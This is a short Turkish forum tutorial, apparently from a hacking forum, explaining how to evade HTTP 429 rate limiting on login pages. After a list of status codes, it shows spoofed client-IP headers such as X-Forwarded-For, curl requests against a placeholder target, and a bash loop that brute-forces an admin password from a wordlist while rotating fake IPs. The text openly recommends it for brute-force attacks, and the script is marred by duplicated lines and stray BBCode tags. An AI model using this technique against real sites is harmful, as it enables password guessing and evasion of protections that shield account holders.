selam dostlar ben @spyizxa1 bu yazıda HTTP 429 hatasını nasıl bypass edeceğimize bakacağız.
429, belirli bir sürede çok fazla istek gonderildiginde ortaya çıkar. Bypass etmekden önce HTTP durum kodlarına da değinelim.
HTTP Durum Kodları:
429, belirli bir sürede çok fazla istek gonderildiginde ortaya çıkar. Bypass etmekden önce HTTP durum kodlarına da değinelim.
HTTP Durum Kodları:
- 200 > isteğin başarılı olduğunu
- 301 > yönlendirme yapılacağını
- 400 > isteğin geçersiz olduğunu
- 401 > kimlik doğrulama gerektiğini
- 403 > erişimin yasak olduğunu
- 404 > sayfanın bulunamaması
- 500 > sunucunun hata vermesi
- 429 > çok fazla istek olduğunu...
Bunları zamanla zaten ezberleyeceksiniz.
Bypass'a Geçelim? sunucular bazı durumlarda ip'yi HTTP başliklarından alır ve bunlar değiştirilerek farklı iplerden geliyormuş gibi gosterilebilir...
X-Forwarded-For: 1.2.3.4
X-Client-IP: 5.6.7.8
X-Originating-IP: 9.8.7.6
X-Remote-Addr: 4.3.2.1
X-Forwarded-Host: 8.8.8.8
Bu HTTP başlikları kullanıcının yani istemcinin ip'sini belirtir yani kullanım amaçları çok farklı değil.
curl -H "X-Forwarded-For: 1.1.1.1" https://target.com/logincurl -H "X-Forwarded-For: 2.2.2.2" https://target.com/login
#!/bin/bash[B]i=1[/B][B]for pass in $(cat wordlist.txt); do[/B][B] ip="1.1.1.$i"[/B][B] curl -s -X POST https://target.com/login \[/B][B] -H "X-Forwarded-For: $ip" \[/B][B] -d "user=admin&pass=$pass"[/B][B] ((i++))[/B]doneBu şekilde istek gondererek sunucuyu bypass edebilirsiniz, mesela bunu bir brute force saldirisinda kullanabilirsiniz her istek de farklı ip kullanarak istekleri başarili bir şekilde iletebiliriz. tabi sunucu ipyi başka yerden alıyorsa işe yaramayabilir bunun icinde proxy kullanabilirsiniz ama bu yöntem daha etkili olacağı için bunu da denemekte fayda var.
THE END
